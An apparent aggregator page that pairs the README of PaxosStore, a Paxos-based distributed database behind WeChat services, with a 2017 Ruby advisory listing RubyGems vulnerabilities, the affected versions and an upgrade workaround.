PaxosStore is a distributed-database initially by Google MegaStore. It's the second generation of storage system developed to support current WeChat sevice and applications. PaxosStore has been deployed in WeChat production for more than two years, providing storage services for the core businesses of WeChat backend including user account management, user relationship management (i.e., contacts), instant messaging, social networking (i.e., Moments), and online payment (i.e., WeChat Pay).

Now PaxosStore is running on thousands of machines, and is able to afford billions of peak TPS.

Prior to PaxosStore, we have been using a QuorumKV storage system to support various WeChat services with strongly consistent read/write since 2011. As the number of storage servers rises to tens of thousand, the operational mantenance and development of a NWR-based system in such a large scale become painful. That's why we come up with PaxosStore: a new generation of distributed database, built on top of the leaseless Paxos consensus layer, providing

  • Two paxos consensue libraries (the key algorithms described in our paper published at the VLDB 2017 are now open source):

    • Certain for the general PaxosLog + DB design;
    • PaxosKV optimized for key-value storage (PaxosLog-as-value);

    In addition, the following items are planned for open source by October 2017.

  • A high performance key-value system

  • A system that supports rich data structures such as queues, list, set and collections

  • A high performance storage engine backed by LSM-tree

  • A New SQL-like Table system

The PaxosStore Architecture

image

Please refer to the following publications for the technical details of PaxosStore.

Build

License

PaxosStore is under the BSD 3-Clause License. See the LICENSE.txt file for details.

Multiple vulnerabilities in RubyGems

$
0
0

There are multiple vulnerabilities in RubyGems bundled by Ruby. It is reported at the official blog of RubyGems.

Details

The following vulnerabilities have been reported.

  • a DNS request hijacking vulnerability
  • an ANSI escape sequence vulnerability
  • a DoS vulernerability in the query command
  • a vulnerability in the gem installer that allowed a malicious gem to overwrite arbitrary files

It is strongly recommended for Ruby users to take one of the following workarounds as soon as possible.

Affected Versions

  • Ruby 2.2 series: 2.2.7 and earlier
  • Ruby 2.3 series: 2.3.4 and earlier
  • Ruby 2.4 series: 2.4.1 and earlier
  • prior to trunk revision 59672

Workarounds

At this moment, there are no Ruby releases including the fix for RubyGems. But you can upgrade RubyGems to the latest version. RubyGems 2.6.13 or later includes the fix for the vulnerabilities.

gem update --system

If you can’t upgrade RubyGems, you can apply the following patches as a workaround.

About the trunk, update to the latest revision.

Credits

This report is based on the official blog of RubyGems.

History

  • Originally published at 2017-08-29 12:00:00 UTC
Viewing all 25817 articles
Browse latest View live


<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>